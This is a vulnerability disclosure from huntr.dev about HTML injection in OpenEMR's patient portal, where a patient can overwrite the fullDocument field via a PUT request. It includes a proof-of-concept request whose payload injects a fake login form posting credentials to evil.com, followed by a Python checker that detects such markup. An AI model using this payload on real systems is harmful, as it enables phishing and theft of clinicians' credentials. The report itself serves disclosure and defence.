huntr | leorac | 612D13CF-2EF9-44EA-B8FB-E797948A9A86
History: Dec 26, 2022 - 5:33 a.m.

Patient ability to rewrite its own documents leads to HTML injection

2022-12-26 05:33:28
leorac
www.huntr.dev
10
html injection
put request vulnerability
patient documents

EPSS: 0.007 (Low), Percentile: 79.8%

Description

It looks like that, through the PUT request, a Patient can rewrite its own document via the fullDocument JSON parameter. In this way a malicious patient can override the document form and rewrite it as they please, also injecting valid HTML code that the Doctor would then see when viewing the document.

Proof of Concept

  • Log in on http://demo.openemr.io/openemr/portal/home.php as a Patient.
  • Go to the “My Documents” section and open, for example, “Insurance Info”.
  • You will see a regular form. Change something in the form and click Save; this triggers a PUT request to the /openemr/portal/patient/api/onsitedocument/<ID> endpoint.
  • You will notice a fullDocument JSON parameter whose value can be changed.
  • Trigger a request like this:
PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io

{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br>&lt;form method='post' action='//evil.com/login.php'&gt;username:&lt;input type='text' name='username' /&gt;<br />password: &lt;input type='password'  name='password'&gt;<br />&lt;input type='submit' value='login' /&gt;&lt;/form&gt;<br /><a href=\"//evil.com\">click here</a>"}
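The root cause is that a patient-controlled fullDocument is stored and later rendered to a clinician as HTML. Below is an added example (not OpenEMR's code) of the kind of server-side policy check a portal could run on fullDocument before accepting the PUT: it flags forbidden elements, inline event handlers and URLs pointing off the portal host (TRUSTED_HOST is an assumption), and it checks the entity-decoded text as well, because the PoC above hides its form behind &lt;form&gt; entities that a lenient renderer could decode.

```python
from html import unescape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements a patient-editable document has no business containing.
FORBIDDEN_TAGS = {"script", "iframe", "object", "embed", "form", "meta", "link", "style"}
# Attributes that load or navigate to a URL; compared against the portal's own host.
URL_ATTRS = {"href", "src", "action", "formaction"}
TRUSTED_HOST = "demo.openemr.io"  # assumption: the host serving the patient portal


class _PolicyChecker(HTMLParser):
    """Collects policy violations while walking the start tags of a document."""

    def __init__(self):
        super().__init__()
        self.violations = []

    def handle_starttag(self, tag, attrs):
        if tag in FORBIDDEN_TAGS:
            self.violations.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):  # inline event handlers (onclick, onload, ...)
                self.violations.append(f"attr:{tag}.{name}")
            elif name in URL_ATTRS and value is not None:
                url = urlparse(value.strip())
                # javascript:/data: URLs and any host other than the portal are rejected
                if url.scheme in ("javascript", "data") or (url.netloc and url.netloc != TRUSTED_HOST):
                    self.violations.append(f"url:{tag}.{name}={value.strip()}")


def check_document(full_document: str):
    """Return sorted, de-duplicated violations for the document as submitted
    and after entity decoding; an empty list means the document is acceptable."""
    found = set()
    for text in (full_document, unescape(full_document)):
        checker = _PolicyChecker()
        checker.feed(text)
        checker.close()
        found.update(checker.violations)
    return sorted(found)


# Sample inputs: the fullDocument value from the PoC above, and a constructed benign form.
POC_PAYLOAD = ("<h3>please provide your username and password:</h3><br>"
               "&lt;form method='post' action='//evil.com/login.php'&gt;"
               "username:&lt;input type='text' name='username' /&gt;<br />"
               "password: &lt;input type='password'  name='password'&gt;<br />"
               "&lt;input type='submit' value='login' /&gt;&lt;/form&gt;<br />"
               '<a href="//evil.com">click here</a>')
BENIGN_DOC = "<h3>Insurance Info</h3><label>Policy number: <input type='text' name='policy'></label>"
```

A request whose fullDocument yields any violation should be rejected with a 4xx and logged with the patient id, which also gives the SOC a clean detection signal for this abuse pattern.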

